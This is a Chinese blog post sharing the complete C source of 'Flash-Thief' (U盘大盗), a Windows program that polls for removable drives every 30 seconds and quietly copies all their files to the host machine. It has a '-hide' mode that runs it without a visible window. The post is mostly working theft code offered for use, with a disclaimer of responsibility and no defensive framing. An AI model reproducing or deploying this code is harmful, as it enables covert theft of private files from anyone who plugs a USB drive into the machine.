U盘大盗 c语言版

看某期《黑客防线》上有介绍编写“U盘小偷”这个盗取U盘内所有文件的程序的文章,反正也没事做,自己也写了一个。文中是用VC++加MFC写的,我用C、API来写,而且名字叫“U盘大盗”,不然怎么会叫DIY呢^_^
原理很简单,就是每隔一段时间探测驱动器,发现可移动盘就把里面的内容copy到机器上。几下子就搞定。代码如下,有关函数的可参考MSDN、CSDN搜索(还多亏了它呢)。
#include "windows.h"
#include "stdio.h"
#include "string.h"
#include "direct.h"
char dir[260];
/*
看好啦,偷东西咯~
*/
void Copy( char* FileName )

{

        char dir2[260];
         strcpy( dir2 , dir );

        //从全路径提取出文件名

         char* temp = strchr(FileName,'\\');
         temp++;

         strcat(dir2 , temp );

         CopyFile( FileName , dir2 , 1 );
}

void CreateDir( char * path )

{

         char temp2[260];strcpy( temp2 , dir );

         char* temp = strchr( path , '\\');

         temp++;

         strcat(temp2 , temp );

         mkdir( temp2 );
}

/*

这个函数就是遍历目录得到文件

*/

void GetFile( char* FilePath )

{

         char temp[260],temp1[260];

         strcpy( temp ,FilePath );

         WIN32_FIND_DATA FindFileData;

         HANDLE hFind;

         strcat( temp , "*");

         //printf("%s",temp);

         hFind = FindFirstFile( temp , &FindFileData );
         //printf("%s\n",FindFileData.cFileName );

         if ( hFind == INVALID_HANDLE_VALUE )

         {

                //printf ("Invalid File Handle. GetLastError reports %d\n", GetLastError ());

                //exit(0);

         }

         else

         {    

                //printf("%s",temp1);           

                       do

                       {

                              strcpy( temp1 , FilePath );

                              strcat( temp1 , FindFileData.cFileName );

                              if(strcmp( FindFileData.cFileName , "." )!=0&&strcmp( FindFileData.cFileName , ".." )!=0)

                              {

                                     if( FindFileData.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY )

                                     {

                                                   strcat( temp1 , "\\" );

                                                   CreateDir( temp1 );

                                                   GetFile( temp1 );

                                     }

                                     else

                                     {

                                            //printf("%s\n",temp1 );

                                            Copy( temp1 );

                                     }                  

                              }

                       }while( FindNextFile( hFind,&FindFileData ) );

         }

         FindClose(hFind);
}

/*

这个函数检测是否为可移动磁盘

*/

int CheckDisk(char *disk)

{

         if(GetDriveType(disk)==DRIVE_REMOVABLE)return 0;

         return -1;
}

int Steal()

{

         char buf[10];

         DWORD lod=GetLogicalDrives();

/*

GetLogicalDrives 返回的是一个32位整数,将他转换成二进制后,最高位表示驱动器A: 依次类推

比如,10111000000000000000000000000000

表示这台机器有驱动器 a,c,d,e

*/

         if (lod!=0)

         {

         for (int i=0;i<26;i++)

                {

                       if ((lod & 1)==1)

                       {

                              sprintf(buf,"%c",'A'+i);

                              strcat(buf,":\\");

                              if(!CheckDisk(buf))

                              {

                                     //现在判断驱动是否准备就绪~

                                     if(GetVolumeInformation(buf,0,0,0,0,0,0,0))

                                     {

                                         

                                            GetFile(buf);//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                            //GetFile("j:\\a\\");

                                     }

                                         

                              }

                       }

                       lod=lod>>1;

                }

}

         return 0;

}

int main(int argc, char* argv[])

{

                SYSTEMTIME st;

                char dtime[20],temp[10];

                GetLocalTime( &st );

                itoa( st.wYear ,temp , 10 );

                strcpy( dtime , temp );

                itoa( st.wMonth ,temp , 10 );

                strcat( dtime , temp );

                itoa( st.wDay ,temp , 10 );

                strcat( dtime , temp );

                mkdir( dtime );

                getcwd( dir , 260 );

                strcat( dir , "\\");

                strcat( dir , dtime );

                strcat( dir , "\\" );

         if(argc!=2)

         {

                printf("\n Flash-Thief 1.0 by lake2 ( http://lake2.126.com )    \n");

                printf("Date: \t2005-5-28\n");

                printf("You can quit this program with Ctrl + C \nand you can run it in hide mode with \'-hide\'    \n");

                printf("It's nothing with me whatever you do ! \n");

                printf("Running.......\n");

                while(1)

                {

                       Steal();

                       Sleep(30000);

                }

         }

         else

         {

                if(strcmp( argv[1] , "-hide" )==0){printf("It's nothing with me whatever you do ! \n");ShellExecute( 0, "open", argv[0], NULL, NULL, SW_HIDE );}

                else

                       printf("Parameter %s is invalid",argv[1]);

         }

         return 0;

}

  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值